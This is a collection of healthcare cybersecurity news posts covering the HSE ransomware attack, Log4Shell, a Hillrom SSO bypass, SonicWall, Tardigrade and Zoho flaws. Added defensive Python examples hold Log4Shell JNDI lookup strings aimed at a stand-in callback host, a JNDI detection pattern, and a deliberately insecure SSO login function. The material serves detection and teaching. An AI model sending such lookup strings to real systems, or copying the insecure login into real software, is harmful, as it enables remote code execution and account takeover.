Healthcare Cybersecurity

Learnings from a Major Healthcare Ransomware Attack

One of the most serious healthcare ransomware attacks occurred in Ireland earlier this year. The Health Service Executive (HSE), the Republic of Ireland’s national health system, suffered a major attack that resulted in Conti ransomware being deployed and forced its National Healthcare Network to be taken offline. That meant healthcare professionals across the country were prevented from accessing all HSE IT systems, including clinical care systems, patient records, laboratory systems, payroll, and other clinical and non-clinical systems, which caused major disruption to healthcare services across the country.

Following the attack, the HSE Board commissioned PricewaterhouseCoopers (PWC) to conduct an independent post-incident review into the attack to establish the facts related to technical and operational preparedness and the circumstances that allowed the attackers to gain access to its systems, exfiltrate sensitive data, encrypt files, and extort the HSE.

Cybersecurity Failures that are Common in the Healthcare Industry

PWC’s recently published report highlights a number of security failures that allowed HSE systems to be infiltrated. While the report is specific to the HSE cyberattack, its findings are applicable to many healthcare organizations in the United States that have similar unaddressed vulnerabilities and a lack of preparedness for ransomware attacks. The recommendations made by PWC can be used to strengthen defenses to prevent similar attacks from occurring.

While the HSE ransomware attack affected a huge number of IT systems, it started with a phishing email. An employee was sent an email with a malicious Microsoft Excel spreadsheet as an attachment on March 16, 2021. When the attachment was opened, malware was installed on the device. The HSE workstation had antivirus software installed, which could have detected the malicious file and prevented the malware infection; however, the virus definition list had not been updated for over a year, which rendered the protection near to non-existent.

From that single infected device, the attacker was able to move laterally within the network, compromise several accounts with high-level privileges, gain access to large numbers of servers, and exfiltrate data ‘undetected’. On May 14, 2021, 8 weeks after the initial compromise, Conti ransomware was extensively deployed and encrypted files. The HSE detected the encryption and shut down the National Health Network to contain the attack, which prevented healthcare professionals across the country from accessing applications and essential data.

During the 8 weeks that its systems were compromised, suspicious activity was detected on more than one occasion that should have triggered an investigation into a potential security breach, but those alerts were not acted upon. Had they been investigated, the deployment of ransomware could have been prevented, and potentially the exfiltration of sensitive data as well.

Simple Techniques Used to Devastating Effect

According to PWC, the attacker was able to use well-known and simple attack techniques to move around the network, identify and exfiltrate sensitive data, and deploy Conti ransomware over large parts of the IT network with relative ease. The attack could have been far worse. The attacker could have targeted medical devices, destroyed data at scale, used auto-propagation mechanisms such as those used in the WannaCry ransomware attacks, and could also have targeted cloud systems.

The HSE made it clear that it would not be paying the ransom. On May 20, 2021, 6 days after the HSE shut down all HSE IT system access to contain the attack, the attackers released the keys to decrypt data. Had it not been for a strong response to the attack and the release of the decryption keys the implications could have been much more severe. Even with the keys to decrypt data it took until September 21, 2021, for the HSE to successfully decrypt all of its servers and restore around 99% of its applications. The HSE estimated the cost of the attack could rise to half a billion Euros.

Ireland’s Largest Employer Had No CISO

PWC said the attack was possible due to a low level of cybersecurity maturity, weak IT systems and controls, and staffing issues. There was a lack of cybersecurity leadership, as no individual in the HSE was responsible for providing leadership and direction of its cybersecurity efforts, which is very unusual for an organization of the size and complexity of the HSE. The HSE is Ireland’s largest employer and had over 130,000 staff members and more than 70,000 devices at the time of the attack, but the HSE only employed 1,519 staff in cybersecurity roles. PWC said employees with responsibility for cybersecurity did not have the necessary skills to perform the tasks expected of them, and the HSE should have had a Chief Information Security Officer (CISO) with overall responsibility for cybersecurity.

Lack of Monitoring and Insufficient Cybersecurity Controls

The HSE did not have the capability to effectively monitor and respond to security alerts across its entire network. Patching was sluggish, and updates were not applied quickly across the IT systems connected to the National Health Network. The HSE was also reliant on a single anti-malware solution that was not being monitored or effectively maintained across its entire IT environment. The HSE also continued to use legacy systems with known security issues and remains heavily reliant on Windows 7.

“The HSE is operating on a frail IT estate that has lacked the investment over many years required to maintain a secure, resilient, modern IT infrastructure. It does not possess the required cybersecurity capabilities to protect the operation of the health services and the data they process, from the cyber attacks that all organizations face today,” concluded PWC. “It does not have sufficient subject matter expertise, resources, or appropriate security tooling to detect, prevent or respond to a cyber attack of this scale. There were several missed opportunities to detect malicious activity, prior to the detonation phase of the ransomware.”

Similar vulnerabilities in people, processes, and technology can be found in many health systems around the world, and the PWC recommendations can be applied beyond the HSE to improve cybersecurity and make it harder for attacks such as this to succeed.

The PWC report, recommendations, and learnings from the incident can be found here (PDF).

The post Learnings from a Major Healthcare Ransomware Attack appeared first on HIPAA Journal.

Max-Severity Apache Log4j Zero-day Vulnerability Extensively Exploited in the Wild

A maximum-severity vulnerability has been identified in Apache Log4j, an open-source Java-based logging library used by many thousands of organizations in their enterprise applications and by many cloud services.

The vulnerability, dubbed Log4Shell and tracked as CVE-2021-44228, is as serious as they come, with some security researchers claiming the flaw is the most serious to be discovered in the past decade due to its ease of exploitation and the sheer number of enterprise applications and cloud services that are affected.

The vulnerability can be exploited without authentication to achieve remote code execution and take full control of vulnerable systems. The vulnerability affects Apache Log4j versions 2.0 through 2.14.1 and has been fixed in version 2.15.0.

The advice is to ensure the upgrade is performed immediately as a proof-of-concept exploit for the flaw is in the public domain, extensive scans are being performed for vulnerable systems, and there have been many cases of the flaw being exploited in the wild. Some reports suggest the improper input validation bug has been exploited in the wild for some time before it was discovered by researchers at Alibaba Cloud on November 24.

The vulnerability was first detected being exploited against Minecraft, which still uses Java, but many web apps and business applications also use Java and are vulnerable to attack. The vulnerability also affects multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink, among others.

The vulnerability can be exploited by manipulating log messages to execute arbitrary code from LDAP servers when message lookup substitution is enabled. This is a Java deserialization issue due to the library making network requests through the Java Naming and Directory Interface (JNDI) to an LDAP server and executing code that’s returned. By manipulating the log messages to trigger a look-up to an attacker-controlled server, an attacker can execute code on the victim’s system. Exploiting the bug requires the attacker to get a vulnerable application to log a special string, which is trivial for threat actors and requires a single line of code.

According to UK security researcher Marcus Hutchins, threat actors attacked Minecraft servers by simply pasting a short message into the chatbox. The bug is known to have been exploited to deploy cryptocurrency miners, to install botnet code on IoT devices, and initial access brokers have been scrambling to exploit the code, so it is inevitable that it will provide the initial access to allow ransomware attacks.

“I cannot overstate the seriousness of this threat. On the face of it, this is aimed at cryptominers but we believe this creates just the sort of background noise that serious threat actors will try to exploit in order to attack a whole range of high-value targets such as banks, state security, and critical infrastructure,” explained Lotem Finkelstein, director of threat intelligence and research at Check Point.

If it is not possible to immediately update to version 2.15.0, there are mitigations that can prevent exploitation in version 2.10.0 and later. A vulnerability “vaccine” has been released by Cybereason that can be used to protect against exploitation by using the vulnerability to run code that changes the settings to prevent further exploitation. The vaccine could be used to gain some time, although the best option is to update to the latest Apache Log4j version.

The vulnerable code could be anywhere, so fixing the issue is not likely to be straightforward, although Huntress has released a tool that can be used to check if applications are affected – available here.

Mitigations that can be applied if the update cannot be easily performed have been released by Apache. “In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.”
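The Apache guidance quoted above gives three different mitigations depending on the log4j-core version in use, which makes it easy to apply the wrong one (the formatMsgNoLookups setting, for instance, has no effect before 2.10). The following script is an added example, not code from HIPAA Journal, Apache, or the Huntress tool mentioned above. It reads the version from the pom.properties file that log4j-core jars ship, checks whether JndiLookup.class is still present, and reads the log4j2.formatMsgNoLookups / LOG4J_FORMAT_MSG_NO_LOOKUPS flag from a dictionary standing in for the JVM system properties and process environment. The jar it builds to exercise the check is constructed here and contains only the two entries the check looks at.

```python
"""Assess a log4j-core jar against Apache's CVE-2021-44228 mitigation guidance.

Added example (not HIPAA Journal's, Apache's, or Huntress's code). The
version ranges are the ones in Apache's guidance: fixed in 2.15.0,
formatMsgNoLookups honoured from 2.10, JndiLookup.class removal for
2.0-beta9 through 2.10.0.
"""
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple: (2, 14, 1, 0) / (2, 0, -1, 9)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?$", text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch, beta = m.groups()
    # A beta sorts below every release with the same major.minor (patch slot = -1).
    return (int(major), int(minor), -1 if beta else int(patch or 0), int(beta or 0))


def read_jar(data):
    """Return (version_string_or_None, jndi_lookup_present) for jar bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode().splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        return version, JNDI_LOOKUP_CLASS in names


def assess(jar_bytes, settings):
    """Classify the jar as not_affected / mitigated / vulnerable / unknown, with a reason.

    `settings` stands in for JVM system properties plus the environment, so the
    no-lookups flag can arrive under either of the two names Apache documents.
    """
    version, has_jndi = read_jar(jar_bytes)
    if version is None:
        return "unknown", "no log4j-core pom.properties found; inspect the jar contents manually"
    v = parse_version(version)
    if v >= (2, 15, 0, 0):
        return "not_affected", f"log4j-core {version} contains the fix"
    if v < (2, 0, -1, 9):
        return "not_affected", f"log4j-core {version} predates the affected range"
    if not has_jndi:
        return "mitigated", "JndiLookup.class has been removed from the jar"
    flag = settings.get("log4j2.formatMsgNoLookups", settings.get("LOG4J_FORMAT_MSG_NO_LOOKUPS", ""))
    no_lookups = str(flag).lower() == "true"
    if v >= (2, 10, 0, 0) and no_lookups:
        return "mitigated", f"log4j-core {version} with formatMsgNoLookups=true"
    if no_lookups:
        return "vulnerable", f"log4j-core {version} ignores formatMsgNoLookups (honoured only from 2.10); remove JndiLookup.class"
    return "vulnerable", f"log4j-core {version} with JndiLookup present and message lookups enabled"


def build_sample_jar(version, include_jndi=True):
    """Construct a minimal stand-in jar (not a real log4j build) to exercise the check."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPERTIES, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if include_jndi:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


if __name__ == "__main__":
    cases = [
        ("2.14.1", True, {}),
        ("2.14.1", True, {"LOG4J_FORMAT_MSG_NO_LOOKUPS": "true"}),
        ("2.9.1", True, {"log4j2.formatMsgNoLookups": "true"}),
        ("2.9.1", False, {}),
        ("2.15.0", True, {}),
    ]
    for ver, jndi, env in cases:
        print(ver, "jndi" if jndi else "no-jndi", env, "->", assess(build_sample_jar(ver, jndi), env))
```

The check returns "unknown" rather than "not_affected" when the pom.properties entry is missing, because shaded or repackaged application jars embed log4j classes without that file; for those, searching every jar on the classpath for the JndiLookup class name is the reliable fallback.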

Since there have been many cases of the flaw being exploited, it is important to not only fix the vulnerability but to also assume the flaw has already been exploited and to check logs for any unusual activity after systems and applications have been secured.
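Checking logs for exploitation attempts, as recommended above, means searching every logged field (request paths, headers, form input, chat messages) for the JNDI lookup syntax that triggers the vulnerability. The script below is an added example, not from HIPAA Journal or any vendor; the access-log lines it scans are constructed for the demonstration, using documentation IP ranges. It URL-decodes each line before matching, since request paths usually reach the log encoded, and summarizes the callback hosts it finds so the incident-response team has a list of indicators to search for elsewhere.

```python
"""Scan application log lines for Log4j JNDI lookup strings (CVE-2021-44228).

Added example, not HIPAA Journal's or any vendor's code. It matches the
publicly documented `${jndi:<scheme>://<host>` lookup syntax after
URL-decoding, and reports the callback hosts seen.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Scheme and host of the lookup target; the host group stops at '/', whitespace or '}'.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)

# Constructed sample access log (Apache combined format); 198.51.100.0/24 and
# 203.0.113.0/24 are documentation ranges, not real hosts.
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:14:02:16 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.40 - - [10/Dec/2021:14:03:02 +0000] "POST /api/login HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]


def normalize(line):
    """URL-decode up to twice (double-encoded paths are common), stopping when stable."""
    for _ in range(2):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def find_jndi_lookups(lines):
    """Return (line_number, scheme, host) for every lookup string found."""
    hits = []
    for number, raw in enumerate(lines, 1):
        for match in JNDI_PATTERN.finditer(normalize(raw)):
            hits.append((number, match.group(1).lower(), match.group(2)))
    return hits


def summarize(hits):
    """Count occurrences per callback host so the IR team has a block/search list."""
    return dict(Counter(host for _, _, host in hits))


if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOG)
    for number, scheme, host in found:
        print(f"line {number}: jndi lookup via {scheme} to {host}")
    print("callback hosts:", summarize(found))
```

A clean result from this scan is not proof that nothing happened: the lookup string can arrive in any field the application logs, not only the web server's access log, so the same search should be run over the application's own log files, and outbound connection records from application servers to unexpected hosts on LDAP or similar ports are the complementary signal to review.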

The post Max-Severity Apache Log4j Zero-day Vulnerability Extensively Exploited in the Wild appeared first on HIPAA Journal.

High-Severity Authentication Bug Identified in Hillrom Welch Allyn Cardio Products

A high-severity vulnerability has been identified in certain Hillrom Welch Allyn Cardio products that allows accounts to be accessed without a password.

The vulnerability is an authentication bypass issue that exists when the Hillrom cardiology products have been configured to use single sign-on (SSO). The vulnerability allows the manual entry of any Active Directory (AD) account provisioned within the application, and access is granted without the associated password having to be provided. That means a remote attacker could access the application under the entered AD account and gain all privileges associated with that account.

The vulnerability is tracked as CVE-2021-43935 and has been assigned a CVSS v3 base score of 8.1 out of 10.

According to Hillrom, the vulnerability affects the following Hillrom Welch Allyn cardiology products:

  • Welch Allyn Q-Stress Cardiac Stress Testing System: Versions 6.0.0 through 6.3.1
  • Welch Allyn X-Scribe Cardiac Stress Testing System: Versions 5.01 through 6.3.1
  • Welch Allyn Diagnostic Cardiology Suite: Version 2.1.0
  • Welch Allyn Vision Express: Versions 6.1.0 through 6.4.0
  • Welch Allyn H-Scribe Holter Analysis System: Versions 5.01 through 6.4.0
  • Welch Allyn R-Scribe Resting ECG System: Versions 5.01 through 7.0.0
  • Welch Allyn Connex Cardio: Versions 1.0.0 through 1.1.1

Hillrom will address this vulnerability in the next software release; however, as an interim measure to prevent the vulnerability from being exploited, users of the affected products should disable the SSO feature in the respective Modality Manager Configuration settings. In addition, customers should ensure they apply proper network and physical security controls and should apply authentication for server access.
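The design lesson behind an SSO authentication bypass of this kind is that the application must never treat an account name supplied by the client as proof of identity; only an assertion that the identity provider has signed, after it authenticated the user, can establish who is logging in. The following is an added example, not Hillrom's code and not a description of the mechanism behind CVE-2021-43935 (the advisory above describes only the effect). It contrasts a deliberately insecure SSO hand-off that trusts a submitted username with one that accepts only a fresh, HMAC-signed assertion; the account list, shared secret and assertion format are all constructed for the demonstration.

```python
"""SSO hand-off: trusting a client-supplied account name versus verifying an IdP assertion.

Added example, not Hillrom's code. `login_sso_insecure` is the deliberately
broken pattern; `login_sso_verified` is the hardened form.
"""
import hashlib
import hmac
import json
import time

# Constructed stand-in for the AD accounts provisioned within the application.
PROVISIONED_AD_ACCOUNTS = {"jdoe": "technician", "admin.cardio": "administrator"}

# Constructed shared secret between the identity provider and the application.
IDP_SHARED_SECRET = b"constructed-demo-secret-do-not-reuse"


def login_sso_insecure(request, sso_enabled=True):
    """Broken pattern: with SSO on, any provisioned account name is accepted as-is."""
    user = request.get("username")
    if sso_enabled and user in PROVISIONED_AD_ACCOUNTS:
        return {"user": user, "role": PROVISIONED_AD_ACCOUNTS[user]}
    return None


def issue_assertion(username, secret, now=None):
    """Stand-in for the identity provider: sign (subject, issued-at) after it authenticated the user."""
    payload = json.dumps({"sub": username, "iat": int(now if now is not None else time.time())},
                         sort_keys=True).encode()
    signature = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    return {"payload": payload.decode(), "sig": signature}


def login_sso_verified(request, secret, now=None, max_age=300):
    """Hardened pattern: identity comes only from a signed, fresh IdP assertion."""
    assertion = request.get("assertion")
    if not assertion:
        return None  # a bare username is not an authentication
    payload = assertion.get("payload", "").encode()
    expected = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    # Constant-time comparison; a tampered payload or signature fails here.
    if not hmac.compare_digest(expected, assertion.get("sig", "")):
        return None
    claims = json.loads(payload)
    current = now if now is not None else time.time()
    if current - claims["iat"] > max_age:
        return None  # stale assertion: stops replay of an old hand-off
    user = claims["sub"]
    if user not in PROVISIONED_AD_ACCOUNTS:
        return None  # authenticated at the IdP, but not provisioned for this application
    return {"user": user, "role": PROVISIONED_AD_ACCOUNTS[user]}


if __name__ == "__main__":
    print("insecure:", login_sso_insecure({"username": "admin.cardio"}))
    good = issue_assertion("jdoe", IDP_SHARED_SECRET)
    print("verified, signed:", login_sso_verified({"assertion": good}, IDP_SHARED_SECRET))
    print("verified, username only:", login_sso_verified({"username": "admin.cardio"}, IDP_SHARED_SECRET))
```

Real deployments use SAML or OpenID Connect assertions with public-key signatures, audience and issuer checks rather than a shared HMAC secret, but the property being checked is the same: the application derives the account from a verified assertion, and the interim advice to disable SSO works precisely because it removes the code path that skipped that verification.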

The post High-Severity Authentication Bug Identified in Hillrom Welch Allyn Cardio Products appeared first on HIPAA Journal.

SonicWall Recommends Immediate Firmware Upgrade to Fix Critical Flaws in SMA 100 Series Appliances

SonicWall has released new firmware for its Secure Mobile Access (SMA) 100 series remote access appliances that fixes 8 vulnerabilities, including 2 critical and 4 high-severity flaws.

Vulnerabilities in SonicWall appliances are attractive to threat actors and have been targeted in the past in ransomware attacks. While there are currently no known cases of the latest batch of vulnerabilities being exploited in the wild, there is a high risk of these vulnerabilities being exploited if the firmware is not updated promptly. SMA 100 series appliances include the SonicWall SMA 200, 210, 400, 410, and 500v secure access gateway products, all of which are affected.

The most serious vulnerabilities are buffer overflow issues which could be exploited remotely by an unauthenticated attacker to execute code on vulnerable appliances. These are CVE-2021-20038, an unauthenticated stack-based buffer overflow vulnerability (CVSS score of 9.8), and CVE-2021-20045, which covers multiple unauthenticated file explorer heap-based and stack-based buffer overflow issues (CVSS score 9.4). A further heap-based buffer overflow vulnerability – CVE-2021-20043 – allows remote code execution, although an attacker would need to be authenticated (CVSS score 8.8).

The remaining 3 high-severity vulnerabilities are CVE-2021-20041 – an unauthenticated CPU exhaustion vulnerability (CVSS score 7.5); CVE-2021-20039 – an authenticated command injection vulnerability (CVSS score 7.2); and CVE-2021-20044 – a post-authentication remote code execution vulnerability (CVSS score 7.2).

Two medium-severity vulnerabilities have also been fixed: CVE-2021-20040 – an unauthenticated file upload path traversal vulnerability (CVSS score 6.5) and CVE-2021-20042 – an unauthenticated ‘confused deputy’ vulnerability (CVSS score 6.3).

The firmware update can be accessed at MySonicWall.com and should be applied as soon as possible to prevent exploitation. SonicWall says there are no temporary mitigations that can be implemented to prevent exploitation of the flaws.

The post SonicWall Recommends Immediate Firmware Upgrade to Fix Critical Flaws in SMA 100 Series Appliances appeared first on HIPAA Journal.

Guidance Issued for Healthcare CISOs on Identity, Interoperability, and Patient Access

The Health Information Sharing and Analysis Center (Health-ISAC) has released guidance for Chief Information Security Officers (CISOs) on adopting an identity-centric approach to enabling secure and easy access to patient data to meet the interoperability, patient access, and data sharing requirements of the 21st Century Cures Act.

New federal regulations tied to the 21st Century Cures Act call for healthcare organizations to provide patients with easy access to their healthcare data and ensure patients can easily share their electronic health information (EHI) data wherever, whenever, and with whomever they want. The failure of a healthcare organization to implement systems to support patient access and interoperability could be considered information blocking and would be subject to fines and penalties.

The new federal requirements are for healthcare providers and insurers to allow data sharing through Application Programming Interfaces (APIs) that operate on the Fast Healthcare Interoperability Resources (FHIR) standard. Healthcare providers and insurers are required to establish APIs to allow patients to access their EHI; however, providing patients with easy access to their healthcare data has the potential to introduce security vulnerabilities.

Health-ISAC says that in order to provide easy access to patient data, multiple privacy, security, and usability challenges need to be addressed, all of which are rooted in identity. When users request access to their data, strong authentication controls must be in place to verify that the person requesting EHI is who they say they are. For many years, patient matching problems have plagued the healthcare industry, and without a national patient identifier, those problems exist to this day. Those issues must also be addressed to ensure the correct EHI is provided. Also, if an individual wants to share only part of their EHI, it needs to be possible for a portion of the data to be easily shared.

H-ISAC Framework for Managing Identity

Health-ISAC suggests a Framework for Managing Identity (above) that covers all of those functions; however, privacy and security issues also need to be addressed. For example, if a patient wants to authorize the use of EHI on behalf of someone else that he/she cares for, such as an elderly relative or a minor child, that must be possible. It must also be possible for a patient to delegate access privileges if they are being cared for by someone else, and for appropriate authentication controls to be in place to accommodate such requests. API-level security is also required. FHIR APIs are in the public domain, so they must be secured after authorization to use is granted.

Health-ISAC suggests that healthcare organizations should adopt an identity-centric approach to data sharing to solve these issues. “The most effective way of mitigating the risk that these issues pose to organizations is through the implementation of a modern, robust, and secure identity infrastructure that can securely authenticate and authorize users and incoming requests, enforce the appropriate consent requests, and tightly govern the use of identities,” said Health-ISAC. “By design, this is exactly what the Health-ISAC framework is meant to achieve.”

Additionally, Health-ISAC strongly recommends implementing multi-factor authentication, as while this is not explicitly required by the new ONC and CMS Rules, guidance issued by the government strongly points to the use of MFA. There are risks associated with not implementing MFA due to its importance for authentication. The HHS’ Office for Civil Rights (OCR) has fined health organizations for HIPAA violations related to inadequate authentication in the past. Health-ISAC has produced a white paper – All About Authentication – which explains the best approach for implementing MFA.

“Identity is a journey. As the healthcare industry focuses on digital adoption, identity will continue to play a foundational role. Whether your implementation of a modern identity system is driven by regulatory and compliance requirements, security and privacy concerns, or a desire to improve customer experience, a well-architected, robust digital identity solution can address all of these drivers,” concludes Health-ISAC.

The post Guidance Issued for Healthcare CISOs on Identity, Interoperability, and Patient Access appeared first on HIPAA Journal.

Biomanufacturing Sector Warned of High Risk of Tardigrade Malware Attacks

A highly sophisticated malware capable of aggressively spreading within networks is being used in targeted attacks on the biomanufacturing sector. The malware has been named Tardigrade by security researchers, and initial research suggests it may be a variant of SmokeLoader – a commonly used malware loader and backdoor – although SmokeLoader and Tardigrade malware are quite distinct.

The sophisticated nature of the malware, coupled with the targeted attacks on vaccine manufacturers and their partners, strongly suggests the malware was developed and is being used by an Advanced Persistent Threat (APT) actor. The malware was first detected being used in attacks on the biomanufacturing sector in the spring of 2021, when an infection was discovered at a large U.S. biomanufacturing facility. The malware was identified again in an attack on a biomanufacturing firm in October 2021, and it is believed to have been used in attacks on several firms in the sector.

In contrast to SmokeLoader, which requires instructions to be sent to the malware from its command-and-control infrastructure, Tardigrade malware has far greater autonomy and can use its internal logic to make decisions about lateral movement and which files to modify. The malware has a distributed command-and-control network and uses a variety of IPs that do not correspond to a specific command-and-control node. The malware is also metamorphic, which means its code regularly changes while retaining its functionality. That means signature-based detection mechanisms are not effective at identifying and blocking Tardigrade malware.

Tardigrade malware is stealthy and can be used to gain persistent access to victims’ systems for espionage. The malware creates a tunnel for data exfiltration and has been used to prepare systems for further malicious activities such as ransomware attacks. The malware was first detected when investigating what appeared to be a ransomware attack.

An advisory about the malware was issued by the Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) due to the significant threat the malware poses to the biomanufacturing sector and its partners, with the HHS’ Health Sector Cybersecurity Coordination Center (HC3) also issuing a recent alert about the malware.

BIO-ISAC says all biomanufacturing sites and their partners should assume that they will be targets and should take steps to improve their defenses against this new malware threat. The primary method of malware delivery is believed to be phishing emails, although the malware is capable of spreading via USB drives and can propagate autonomously throughout victims’ networks.

It is important to ensure cybersecurity best practices are followed, such as closing open remote desktop protocol access, updating out-of-date operating systems and software, aggressively segmenting networks, implementing multifactor authentication, and ensuring antivirus software capable of behavioral analysis is used on all devices.

BIO-ISAC also recommends conducting a “crown jewels” analysis, which should include assessing the impact of an attack should certain critical devices be rendered inoperable, ensuring offline backups are performed on biomanufacturing infrastructure, testing backups to ensure recovery is possible, providing phishing awareness training to the workforce, inquiring about lead times for procuring critical infrastructure components such as chromatography, endotoxin, and microbial containment systems, and accelerating the upgrade of legacy equipment.

Further information on the Tardigrade malware threat is available from BIO-ISAC and HC3.

The post Biomanufacturing Sector Warned of High Risk of Tardigrade Malware Attacks appeared first on HIPAA Journal.

APT Actor Exploiting Zoho ManageEngine ServiceDesk Plus to Deliver Webshells

An APT actor that was targeting a vulnerability in the enterprise password management and single sign-on solution Zoho ManageEngine ADSelfService Plus has started exploiting another critical vulnerability in a different Zoho product, the IT helpdesk and asset management solution Zoho ManageEngine ServiceDesk Plus.

The APT group had been exploiting a critical vulnerability in ManageEngine ADSelfService Plus tracked as CVE-2021-40539, which affects Zoho ManageEngine ADSelfService Plus version 6113 and prior, and is a REST API authentication bypass that can be exploited to allow remote code execution.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory on December 2, 2021, about a different vulnerability being exploited by the APT actor. The vulnerability, CVE-2021-44077, affects all versions of Zoho ManageEngine ServiceDesk Plus prior to version 11306, ServiceDesk Plus MSP prior to version 10530, and SupportCenter Plus prior to version 11014. The vulnerability is related to RestAPI URLs in a servlet and ImportTechnicians in the Struts configuration. Successful exploitation of the flaw will allow remote code execution.

The alert warns that APT actors and other threat groups are believed to be exploiting the vulnerability to upload executable files and place webshells on vulnerable systems. The webshells allow a range of different post-exploitation activities such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.

Zoho released a security advisory and patch to correct the CVE-2021-44077 flaw on September 16, 2021, with a further alert issued on November 22, 2021, warning that the vulnerability was being exploited in the wild. The first known exploits of the vulnerability were used in late October 2021, prior to any proof-of-concept exploit being publicly released, indicating the exploit for the vulnerability was developed by the APT actor.

According to Palo Alto Networks, the APT actor has conducted three campaigns this year: the first exploited CVE-2021-40539 in attacks on US ports and defense firms, the second exploited the same vulnerability against targets in a range of different sectors, including healthcare, and the latest campaign exploits the CVE-2021-44077 vulnerability in attacks on the healthcare, education, technology, defense, finance, and entertainment sectors.

In the latest campaign, the APT actor exploits the flaw by sending two requests to the REST API, one uploads an executable file and the second launches the payload. The flaw can be exploited without authentication on vulnerable ServiceDesk servers and has been exploited to deliver a variant of the Godzilla webshell that is different from the variant used in the first two campaigns.

Palo Alto Networks has found evidence suggesting the attacks may have been conducted by the Chinese nation-state APT group tracked as APT 27/Emissary Panda, although the evidence is not sufficient to attribute the attacks to that group. The attacks have mostly been conducted in the United States, with a small number of attacks conducted on targets in India, Turkey, Russia, and the UK.

The FBI and CISA have shared technical details of the attacks, indicators of compromise, network indicators, and YARA rules in Alert AA21-336A.

The post APT Actor Exploiting Zoho ManageEngine ServiceDesk Plus to Deliver Webshells appeared first on HIPAA Journal.